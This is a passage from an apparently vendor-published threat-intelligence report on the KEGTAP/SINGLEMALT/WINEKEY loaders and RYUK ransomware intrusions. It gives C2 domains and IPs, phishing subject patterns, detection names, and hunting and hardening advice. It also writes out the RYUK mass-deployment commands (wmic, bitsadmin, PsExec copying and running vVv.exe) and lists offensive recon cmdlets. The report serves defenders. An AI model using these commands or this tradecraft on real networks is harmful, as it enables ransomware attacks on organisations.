        a78c0e2920e421667ae734d923dd5ca6

        10/15/20

        45.138.172.95:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com

        a0b2378ceae498f46401aadeb278fb31

        10/16/20

        108.62.12.119:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com

        e95bb7804e3add830496bd36664ed339

        10/16/20

        108.62.12.105:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com

        8d5dc95b3bd4d16a3434b991a09bf77e

        10/16/20

        108.62.12.114:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com

        d5de2f5d2ca29da1724735cdb8fbc63f

        10/16/20

        108.62.12.116:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com

        9c7396ecd107ee8f8bf5521afabb0084

        10/16/20

        45.147.230.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

        1134a6f276f4297a083fc2a605e24f70

        10/16/20

        45.147.230.140:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

        2150045f476508f89d9a322561b28ff9

        10/16/20

        45.147.230.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

        f4ddc4562e5001ac8fdf0b7de079b344

        10/19/20

        74.118.138.137:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com

        75fb6789ec03961c869b52336fa4e085

        10/19/20

        74.118.138.115:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com

        9f5e845091015b533b59fe5e8536a435

        10/19/20

        108.177.235.53:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com

        4b78eaa4f2748df27ebf6655ea8a7fe9

        10/19/20

        74.118.138.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com

        bcccda483753c82e62482c55bc743c16

        10/21/20

        45.153.241.1:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com

        672c66dd4bb62047bb836bd89d2e1a65

        10/21/20

        45.153.240.240:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com

        6825409698a326cc319ca40cd85a602e

        10/21/20

        45.153.240.194:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com

        7f9be0302da88e0d322e5701d52d4128

        10/21/20

        45.153.240.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com

        2c6a0856d1a75b303337ac0807429e88

        10/21/20

        45.153.240.136:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com

        6559dbf8c47383b7b493500d7ed76f6a

        10/23/20

        45.153.240.157:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com

        7bd044e0a6689ef29ce23e3ccb0736a3

        10/23/20

        45.153.240.178:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com

        9859a8336d097bc30e6e5c7a8279f18e

        10/23/20

        45.153.240.220:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com

        43fb2c153b59bf46cf6f67e0ddd6ef51

        10/23/20

        45.153.240.222:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com

        22bafb30cc3adaa84fef747d589ab235

        10/23/20

        45.153.241.134:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com

        31e87ba0c90bb38b986af297e4905e00

        10/23/20

        45.153.241.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com

        f8a14846b7da416b14303bced5a6418f

        10/23/20

        45.153.241.146:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com

        01abdaf870d859f9c1fd76f0b0328a2b

        10/23/20

        45.153.241.153:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com

        c2eaf144e21f3aef5fe4b1502d318ba6

        10/23/20

        45.153.241.158:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com

        de54af391602f3deea19cd5e1e912316

        10/23/20

        45.153.241.167:443

        C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com

        5f6fa19ffe5735ff81b0e7981a864dc8

        10/23/20

        45.147.231.222:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com

        ff54a7e6f51a850ef1d744d06d8e6caa

        10/23/20

        45.153.241.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com

        4cda9d0bece4f6156a80967298455bd5

        10/26/20

        74.118.138.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com

        e317485d700bf5e8cb8eea1ec6a72a1a

        10/26/20

        108.62.12.12:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com

        e0022cbf0dd5aa597fee73e79d2b5023

        10/26/20

        108.62.12.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com

        44e7347a522b22cdf5de658a4237ce58

        10/26/20

        172.241.27.65:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com

        cd3e51ee538610879d6fa77fa281bc6f

        10/26/20

        172.241.27.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com

        04b6aec529b3656040a68e17afdabfa4

        10/26/20

        172.241.27.70:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com

        200c25c2b93203392e1acf5d975d6544

        10/26/20

        45.153.241.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com

        9d7c52c79f3825baf97d1318bae3ebe2

        10/27/20

        45.153.241.14:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com

        5bae28b0d0e969af2c0eda21abe91f35

        10/28/20

        190.211.254.154:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com

        a1e62e7e547532831d0dd07832f61f54

        10/28/20

        81.17.28.70:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com

        67c7c75d396988ba7d6cd36f35def3e4

        10/28/20

        81.17.28.105:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com

        880e59b44e7175e62d75128accedb221

        10/28/20

        179.43.160.205:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com

        cdea09a43bef7f1679e9cd1bbeb4b657

        10/28/20

        179.43.158.171:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com

        512c6e39bf03a4240f5a2d32ee710ce5

        10/28/20

        179.43.133.44:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com

        87f3698c743f8a1296babf9fbebafa9f

        10/28/20

        179.43.128.5:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com

        6df66077378c5943453b36bd3a1ed105

        10/28/20

        179.43.128.3:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com

        9706fd787a32a7e94915f91124de3ad3

        10/28/20

        81.17.28.122:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com

        0e1b0266de2b5eaf427f5915086b4d7c

        RYUK Commands

        start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

        start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

        start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

        Detecting the Techniques

        FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

        Platform

        Signature Name

        Endpoint Security

        • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
        • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
        • SINGLEMALT (DOWNLOADER)
        • STILLBOT (BACKDOOR)
        • WINEKEY (DOWNLOADER)
        • CORKBOT (BACKDOOR)
        • RYUK RANSOMWARE ENCRYPT COMMAND (FAMILY)
        • RYUK RANSOMWARE SETUP EXECUTION (FAMILY)
        • RYUK RANSOMWARE WAKE-ON-LAN EXECUTION (FAMILY)
        • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER TARGET (UTILITY)
        • RYUK RANSOMWARE ENCRYPTOR DISTRIBUTION SCRIPT CREATION (UTILITY)
        • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER SOURCE (UTILITY)

        Network Security and Email Security

        • Downloader.Win.KEGTAP
        • Trojan.KEGTAP
        • APTFIN.Backdoor.Win.BEERBOT
        • APTFIN.Downloader.Win.SINGLEMALT
        • APTFIN.Backdoor.Win.STILLBOT
        • APTFIN.Downloader.Win.WINEKEY
        • APTFIN.Backdoor.Win.CORKBOT
        • FE_Downloader_Win64_KEGTAP
        • FE_APTFIN_Backdoor_Win32_BEERBOT
        • FE_APTFIN_Backdoor_Win_BEERBOT
        • FE_APTFIN_Downloader_Win32_SINGLEMALT
        • FE_APTFIN_Downloader_Win64_SINGLEMALT
        • FE_APTFIN_Backdoor_Win_STILLBOT
        • FE_APTFIN_Downloader_Win_WINEKEY
        • FE_APTFIN_Backdoor_Win_CORKBOT

        Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

        Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

        The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

        The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

        Email Campaign TTPs

        Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

        • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
        • This document contains an in-line link to a URL hosting a malware payload.
        • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
        • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

        Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

        • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
        • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
        • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
        • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


        Figure 1: Email containing internal references to target an organization’s name


        Figure 2: Google Docs PDF document containing a target organization’s logo

        Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

        Post-Compromise TTPs

        Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

        Establish Foothold

        Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

        Maintain Presence

        Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

        • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
          • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
        • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
        • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
        • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
        • In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

        Escalate Privileges

        The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

        • The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
        • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. 
        • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.

        Reconnaissance

        The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Activity Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

        • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
          • Get-GPPPassword
          • Invoke-AllChecks
          • Invoke-BloodHound
          • Invoke-EternalBlue
          • Invoke-FileFinder
          • Invoke-HostRecon
          • Invoke-Inveigh
          • Invoke-Kerberoast
          • Invoke-LoginPrompt
          • Invoke-mimikittenz
          • Invoke-ShareFinder
          • Invoke-UserHunter
        • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfigfindstr, and cmd.exe.
        • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
        • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
        • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt
        • The actors used the Nltest command to list domain controllers.

        Lateral Movement

        Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

        • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
        • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
        • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

        Complete Mission

        Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

        • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
        • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
        • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
        • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

        Hunting Strategies

        If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

        • Isolate and perform a forensic review of any impacted systems.
        • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
        • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
        • Reset credentials for any user accounts associated with execution of the malware.
        • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
        • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc) and move towards multi-factor authentication (MFA) as soon as possible.

        An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

        Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

        %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

        Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

        SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS job on a host run the command bitsadmin /list.

        • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
        • Notify state may be set to Fail (Status 2).
        • FileList URL value may be set to the local host or a URL that does not exist.
        • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
        • The Retry Delay value will be set.

        WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

        Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

        Value: Path to the backdoor

        Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

        The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

        • The identification of named scheduled tasks associated with ANCHOR persistence may be constructed according to the following pattern: <Random directory within %APPDATA%> autoupdate#<random number>.
        • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

        Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.

        Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.

        The following are additional strategies that may aid in identifying associated activity:

        • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
        • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
        • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.

        Hardening Strategies

        The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

        • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAS for automated rotation.
        • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability for privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins.Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
        • Block internet access for servers where possible. Often times there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
        • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that do not have a business categorization.
        • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

        For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

        Campaign Indicators

        Sample Email Subjects / Patterns

        • <(first|last)-name>: Important Information
        • <Company Name>
        • <Company Name> complaint
        • <(first|last)-name>
        • <(first|last)-name>
        • Agreement cancellation message
        • Agreement cancellation notice
        • Agreement cancellation notification
        • Agreement cancellation reminder
        • Agreement suspension message
        • Agreement suspension notice
        • Agreement suspension notification
        • Agreement suspension reminder
        • Arrangement cancellation message
        • Arrangement cancellation notice
        • Arrangement cancellation notification
        • Arrangement cancellation reminder
        • Arrangement suspension message
        • Arrangement suspension notice
        • Arrangement suspension notification
        • Arrangement suspension reminder
        • Contract cancellation message
        • Contract cancellation notice
        • Contract cancellation notification
        • Contract cancellation reminder
        • Contract suspension message
        • Contract suspension notice
        • Contract suspension notification
        • Contract suspension reminder
        • debit confirmation
        • FW: <Name> Annual Bonus Report is Ready
        • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
        • RE: <(first|last)-name>
        • RE: <(first|last)-name>: Your Payslip for October
        • RE: <Company Name> - my visit
        • RE: <Company Name> Employee Survey
        • RE: <Company Name> office
        • RE: <Name> about complaint
        • RE: <Name> bonus
        • RE: <Name> termination list
        • RE: <Name>
        • RE: <Company Name> office
        • RE: <(first|last)-name>
        • RE: <(first|last)-name> <(first|last)-name>: complaint
        • RE: <(first|last)-name>: Subpoena
        • RE: <(first|last)-name>
        • RE: <(first|last)-name>: Your Payslip for September
        • RE: about complaint
        • RE: Adopted Filer Forms
        • RE: Business hours adjustment
        • RE: Business hours realignment
        • RE: Business hours rearrangement
        • RE: Business hours restructuring
        • RE: Business schedule adjustment
        • RE: Business schedule realignment
        • RE: Business schedule rearrangement
        • RE: Business schedule restructuring
        • RE: call me
        • RE: changes
        • RE: complaint
        • RE: Complaint in <Company Name>.
        • RE: Complaint on <Name>
        • RE: customer request
        • RE: debit confirmation
        • RE: document copy
        • RE: documents list
        • RE: Edgar Filer forms renovations
        • RE: employee bonuses
        • RE: Filer Forms adaptations
        • RE: my call
        • RE: New filer form types
        • RE: office
        • RE: our meeting
        • RE: Payroll Register
        • RE: report confirmation
        • RE: situation
        • RE: Subpoena
        • RE: termination
        • RE: till 2 pm
        • RE: Urgent <Company Name> Employee Internal Survey
        • RE: visit
        • RE: what about your opinion?
        • RE: what time?
        • RE: why
        • RE: why this debit
        • RE: Working schedule adjustment
        • RE: Working schedule realignment
        • RE: Working schedule rearrangement
        • RE: Working schedule restructuring
        • RE: Your Payslip for September

        Example Malware Family MD5s

        • KEGTAP
          • df00d1192451268c31c1f8568d1ff472
        • BEERBOT
          • 6c6a2bfa5846fab374b2b97e65095ec9
        • SINGLEMALT
          • 37aa5690094cb6d638d0f13851be4246
        • STILLBOT
          • 3176c4a2755ae00f4fffe079608c7b25
        • WINEKEY
          • 9301564bdd572b0773f105287d8837c4
        • CORKBOT
          • 0796f1c1ea0a142fc1eb7109a44c86cb

        Code Signing Certificate CNs

        • ARTBUD RADOM SP Z O O
        • BESPOKE SOFTWARE SOLUTIONS LIMITED
        • Best Fud, OOO
        • BlueMarble GmbH
        • CHOO FSP, LLC
        • Company Megacom SP Z O O
        • ESTELLA, OOO
        • EXON RENTAL SP Z O O
        • Geksan LLC
        • GLOBAL PARK HORIZON SP Z O O
        • Infinite Programming Limited
        • James LTH d.o.o.
        • Logika OOO
        • MADAS d.o.o.
        • MUSTER PLUS SP Z O O
        • NEEDCODE SP Z O O
        • Nordkod LLC
        • NOSOV SP Z O O
        • OOO MEP
        • PLAN CORP PTY LTD
        • REGION TOURISM LLC
        • RESURS-RM OOO
        • Retalit LLC
        • Rumikon LLC
        • SNAB-RESURS, OOO
        • TARAT d.o.o.
        • TES LOGISTIKA d.o.o.
        • VAS CO PTY LTD
        • VB CORPORATE PTY. LTD.
        • VITA-DE d.o.o.

        UNC1878 Indicators

        A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

        BEACON C2s

        First Seen

        Domain

        12/11/19

        updatemanagir[.]us

        12/20/19

        cmdupdatewin[.]com

        12/26/19

        scrservallinst[.]info

        1/10/20

        winsystemupdate[.]com

        1/11/20

        jomamba[.]best

        1/13/20

        updatewinlsass[.]com

        1/16/20

        winsysteminfo[.]com

        1/20/20

        livecheckpointsrs[.]com

        1/21/20

        ciscocheckapi[.]com

        1/28/20

        timesshifts[.]com

        1/29/20

        cylenceprotect[.]com

        1/30/20

        sophosdefence[.]com

        1/30/20

        taskshedulewin[.]com

        1/30/20

        windefenceinfo[.]com

        1/30/20

        lsasswininfo[.]com

        1/30/20

        update-wind[.]com

        1/30/20

        lsassupdate[.]com

        1/30/20

        renovatesystem[.]com

        1/31/20

        updatewinsoftr[.]com

        2/2/20

        cleardefencewin[.]com

        2/2/20

        checkwinupdate[.]com

        2/2/20

        havesetup[.]net

        2/3/20

        update-wins[.]com

        2/3/20

        conhostservice[.]com

        2/4/20

        microsoftupdateswin[.]com

        2/4/20

        iexploreservice[.]com

        2/12/20

        avrenew[.]com

        2/12/20

        target-support[.]online

        2/12/20

        web-analysis[.]live

        2/14/20

        freeallsafe[.]com

        2/17/20

        windefens[.]com

        2/17/20

        defenswin[.]com

        2/17/20

        easytus[.]com

        2/17/20

        greattus[.]com

        2/17/20

        livetus[.]com

        2/17/20

        comssite[.]com

        2/17/20

        findtus[.]com

        2/17/20

        bigtus[.]com

        2/17/20

        aaatus[.]com

        2/17/20

        besttus[.]com

        2/17/20

        firsttus[.]com

        2/17/20

        worldtus[.]com

        2/26/20

        freeoldsafe[.]com

        2/26/20

        serviceupdates[.]net

        2/26/20

        topserviceupdater[.]com

        2/27/20

        myserviceupdater[.]com

        2/29/20

        myservicebooster[.]net

        2/29/20

        servicesbooster[.]org

        2/29/20

        brainschampions[.]com

        2/29/20

        myservicebooster[.]com

        2/29/20

        topservicesbooster[.]com

        2/29/20

        servicesbooster[.]com

        2/29/20

        topservicesecurity[.]org

        2/29/20

        topservicesecurity[.]net

        2/29/20

        topsecurityservice[.]net

        2/29/20

        myyserviceupdater[.]com

        2/29/20

        topservicesupdate[.]com

        2/29/20

        topservicesecurity[.]com

        2/29/20

        servicesecurity[.]org

        2/29/20

        myserviceconnect[.]net

        3/2/20

        topservicesupdates[.]com

        3/2/20

        yoursuperservice[.]com

        3/2/20

        topservicehelper[.]com

        3/2/20

        serviceuphelper[.]com

        3/2/20

        serviceshelpers[.]com

        3/2/20

        boostsecuritys[.]com

        3/3/20

        hakunamatatata[.]com

        3/8/20

        service-updater[.]com

        3/9/20

        secondserviceupdater[.]com

        3/9/20

        twelvethserviceupdater[.]com

        3/9/20

        twentiethservicehelper[.]com

        3/9/20

        twelfthservicehelper[.]com

        3/9/20

        tenthservicehelper[.]com

        3/9/20

        thirdserviceupdater[.]com

        3/9/20

        thirdservicehelper[.]com

        3/9/20

        tenthserviceupdater[.]com

        3/9/20

        thirteenthservicehelper[.]com

        3/9/20

        seventeenthservicehelper[.]com

        3/9/20

        sixteenthservicehelper[.]com

        3/9/20

        sixthservicehelper[.]com

        3/9/20

        seventhservicehelper[.]com

        3/9/20

        seventhserviceupdater[.]com

        3/9/20

        sixthserviceupdater[.]com

        3/9/20

        secondservicehelper[.]com

        3/9/20

        ninthservicehelper[.]com

        3/9/20

        ninethserviceupdater[.]com

        3/9/20

        fourteenthservicehelper[.]com

        3/9/20

        fourthserviceupdater[.]com

        3/9/20

        firstserviceupdater[.]com

        3/9/20

        firstservisehelper[.]com

        3/9/20

        fifthserviceupdater[.]com

        3/9/20

